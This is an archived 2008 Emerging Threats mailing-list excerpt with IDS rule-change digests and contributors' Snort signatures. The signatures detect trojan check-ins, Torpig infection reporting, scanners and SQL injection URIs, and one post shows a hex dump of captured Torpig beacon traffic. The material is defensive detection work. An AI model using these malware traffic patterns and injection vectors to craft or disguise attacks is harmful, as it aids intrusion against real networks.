Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) [---] Removed rules: [---] 2008546 - ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 (emerging.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-dos.rules (1): #by Stillsecure (stillsecure.com) -> Added to emerging-drop-BLOCK.rules (2): # VERSION 1323 # Generated 2008-10-11 00:03:02 EDT -> Added to emerging-drop.rules (2): # VERSION 1323 # Generated 2008-10-11 00:03:02 EDT -> Added to emerging-exploit.rules (2): #by Stillsecure (stillsecure.com) #by Stillsecure (www.stillsecure.com) -> Added to emerging-p2p.rules (1): #by dxp -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Added to emerging-rbn.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Added to emerging-sid-msg.map (35): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2 2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded 2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435 2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301 2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300 2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008623 || ET TROJAN Cinmus.Checkin 1 2008624 || ET TROJAN Cinmus.Checkin 2 2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) 2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm 2008639 || ET TROJAN Tibs Trojan Downloader 2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html 2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html 2008642 || ET TROJAN Keylogger PRO GOLD Post 2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2) 2008644 || ET TROJAN Spy-Net Trojan Connection 2008645 || ET TROJAN Spy-Net Trojan Connection (2) 2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159 2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (35): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2 2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded 2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435 2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301 2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300 2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008623 || ET TROJAN Cinmus.Checkin 1 2008624 || ET TROJAN Cinmus.Checkin 2 2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) 2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm 2008639 || ET TROJAN Tibs Trojan Downloader 2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html 2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html 2008642 || ET TROJAN Keylogger PRO GOLD Post 2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2) 2008644 || ET TROJAN Spy-Net Trojan Connection 2008645 || ET TROJAN Spy-Net Trojan Connection (2) 2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159 2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-virus.rules (5): #Sig by Daniel Clemens #ref: 13bce3215f758d69a6574f7018ed8c32 #This one is lets the client know the server is connected and ready #by jeremy conway #ref: 61441e5fab0173480c05f876e5ebd07b -> Added to emerging-voip.rules (2): #by Kevin Ross #by Kevin Ross -> Added to emerging-web.rules (1): #by Stillsecure (stillsecure.com) -> Added to emerging-web_sql_injection.rules (1): #by Russ McRee -> Added to emerging.rules (1): # fake email for MS Updates results in a trojan that uses this fake UA [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1316 # Generated 2008-10-04 00:03:02 EDT -> Removed from emerging-drop.rules (2): # VERSION 1316 # Generated 2008-10-04 00:03:02 EDT -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Removed from emerging-rbn.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Removed from emerging-sid-msg.map (20): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (20): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging.rules (1): #another unknown, soo to be IDd. Sig by Daniel Clemens From emerging at emergingthreats.net Sun Oct 12 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 12 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081012200008.4BA8C45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Oct 12 16:00:08 2008 [***] [+++] Added rules: [+++] 2008654 - ET SCAN SQLix SQL Injection Vector Scan (emerging-scan.rules) 2008655 - ET MALWARE Frequently Used Fake trojan downloader User Agent (emerging-malware.rules) 2008656 - ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) (emerging-malware.rules) 2008657 - ET MALWARE Suspicious User-Agent Detected (Compatible) (emerging-malware.rules) 2008658 - ET MALWARE Suspicious User-Agent Detected (GetUrlSize) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-malware.rules (3): #by jeremy conway # ref: 6bbaadcf801e9026d27521ae3f093fe0 # ref: 08e90268f52d942927c9f89fc9b796fb -> Added to emerging-sid-msg.map (5): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent 2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) 2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible) 2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize) -> Added to emerging-sid-msg.map.txt (5): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent 2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) 2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible) 2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize) [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (4): 2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From pepperjack at afferentsecurity.com Mon Oct 13 08:20:12 2008 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Mon, 13 Oct 2008 07:20:12 -0500 Subject: [Emerging-Sigs] free colons on rules Message-ID: <20081013072012.2kgx10lhc400o0sc@mail.afferentsecurity.com> There has to be a pun involving "free colons" somewhere, but I just can't come up with one . Maybe "colons are escaping ..." alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC"; flow:established,to_server; content:" HTTP/1.0|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows XP 2600.xpsp.9786-27197)|0d 0a|"; classtype:trojan-activity; reference:url,isc.sans.org/diary.html?storyid=5159; sid:2008646; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN SQLix SQL Injection Vector Scan"; flow:established,to_server; content:"GET "; depth:4; content:"myVAR=1234"; content:"Windows 98"; offset:36; within:120; classtype:attempted-recon; reference:url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project; sid:2008654; rev:1;) jp -- Framework? I don't need no stinking framework! ---------------------------------------------------------------- @fferent Security Labs: Isolate/Insulate/Innovate http://www.afferentsecurity.com From signatures at stillsecure.com Mon Oct 13 09:49:40 2008 From: signatures at stillsecure.com (signatures) Date: Mon, 13 Oct 2008 07:49:40 -0600 Subject: [Emerging-Sigs] StillSecure: 3 New Signatures - Oct-13 -2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2907@webmail.latis.com> Hi Matt, Please find 3 New Signatures below 1. Link Trader Script linkid SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Link Trader Script linkid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/ratelink.php?lnkid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32077/; reference:url,www.milw0rm.com/exploits/6650; sid:8446; rev:1;) 2. MunzurSoft Wep Portal W3 kat SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"MunzurSoft Wep Portal W3 kat SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/kategori.asp?kat="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32238/; reference:url,www.milw0rm.com/exploits/6725; sid:8447; rev:1;) 3. Joomla OwnBiblio Component catid SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla OwnBiblio Component catid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_ownbiblio&view=catalogue"; nocase; uricontent:"&catid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32235/; reference:url,www.milw0rm.com/exploits/6730; sid:8448; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081013/0acd1cde/attachment.html From jonkman at jonkmans.com Mon Oct 13 12:29:27 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 13 Oct 2008 12:29:27 -0400 Subject: [Emerging-Sigs] Torpig In-Reply-To: <48EB6B30.1010204@oitsec.umn.edu> References: <48EB6B30.1010204@oitsec.umn.edu> Message-ID: <48F37767.6010007@jonkmans.com> Posted this: #by Paul Dokas alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Torpig Infection Reporting"; flow:established,to_server; content:"POST "; depth:5; content:"HTTP/1.0|0d 0a|"; content:!"|0d 0a|User-Agent\: "; content:"|0d 0a|Content-Length\: 0|0d 0a|"; content:"|0d 0a|Connection\: close|0d 0a|"; classtype:trojan-activity; sid:2008660; rev:1;) Added a few |0d 0a|'s to make the string larger is all. Good this way? Matt Paul Dokas wrote: > We found some torpig traffic here on our network yesterday that was not > being caught by any rules. One of my co-workers put together a rule to > find this traffic and I tuned it a little. Here it is: > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "TROJAN Torpig Infection"; flow: established,to_server; content:"POST"; content:"HTTP/1.0"; content:"Content-Length: 0"; content:"Connection: close"; classtype:trojan-activity;) > > Hits look like this: > > 000 : 50 4F 53 54 20 2F 43 37 33 39 42 35 43 35 42 45 POST /C739B5C5BE > 010 : 33 43 38 35 41 44 2F 41 42 51 51 36 6D 56 6A 4A 3C85AD/ABQQ6mVjJ > 020 : 46 63 55 67 30 56 56 62 75 59 48 67 6D 56 56 64 FcUg0VVbuYHgmVVd > 030 : 79 30 52 74 6E 63 47 46 6D 46 67 64 32 73 52 30 y0RtncGFmFgd2sR0 > 040 : 6E 63 77 41 2B 42 2F 31 4E 4D 68 41 68 51 43 4A ncwA+B/1NMhAhQCJ > 050 : 51 51 4E 4E 6D 49 57 42 57 46 30 72 36 52 67 6B QQNNmIWBWF0r6Rgk > 060 : 4E 4E 30 4A 7A 42 41 57 78 61 6A 56 36 46 6B 34 NN0JzBAWxajV6Fk4 > 070 : 41 36 30 56 78 42 47 41 63 62 67 42 42 2F 44 52 A60VxBGAcbgBB/DR > 080 : 73 49 68 70 4B 41 36 59 65 59 45 45 72 52 43 42 sIhpKA6YeYEErRCB > 090 : 43 47 62 4E 6D 4B 6D 51 47 51 67 32 32 45 6D 59 CGbNmKmQGQg22EmY > 0a0 : 4E 64 52 64 69 43 51 50 36 4D 6A 56 77 43 30 63 NdRdiCQP6MjVwC0c > 0b0 : 48 72 42 46 6D 41 57 55 5A 59 45 42 41 20 48 54 HrBFmAWUZYEBA HT > 0c0 : 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 66 69 TP/1.0..Host: fi > 0d0 : 62 69 64 6F 2E 63 6F 6D 0D 0A 43 6F 6E 74 65 6E bido.com..Conten > 0e0 : 74 2D 4C 65 6E 67 74 68 3A 20 30 0D 0A 43 6F 6E t-Length: 0..Con > 0f0 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close.. > 100 : 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap > 110 : 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D plication/x-www- > 120 : 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D form-urlencoded. > 130 : 0A 0D 0A ... > > > I'm sure that this rule can be tuned even more. At this point we're no > longer getting any false positives. > > Enjoy! > > Paul -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Mon Oct 13 12:33:22 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 13 Oct 2008 12:33:22 -0400 Subject: [Emerging-Sigs] free colons on rules In-Reply-To: <20081013072012.2kgx10lhc400o0sc@mail.afferentsecurity.com> References: <20081013072012.2kgx10lhc400o0sc@mail.afferentsecurity.com> Message-ID: <48F37852.2040708@jonkmans.com> Freed colons? Evacuated colon? Anyway, fixed up, Thanks Jack! matt Jack Pepper wrote: > There has to be a pun involving "free colons" somewhere, but I just > can't come up with one . Maybe "colons are escaping ..." > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to > CnC"; flow:established,to_server; content:" HTTP/1.0|0d > 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows XP > 2600.xpsp.9786-27197)|0d 0a|"; classtype:trojan-activity; > reference:url,isc.sans.org/diary.html?storyid=5159; 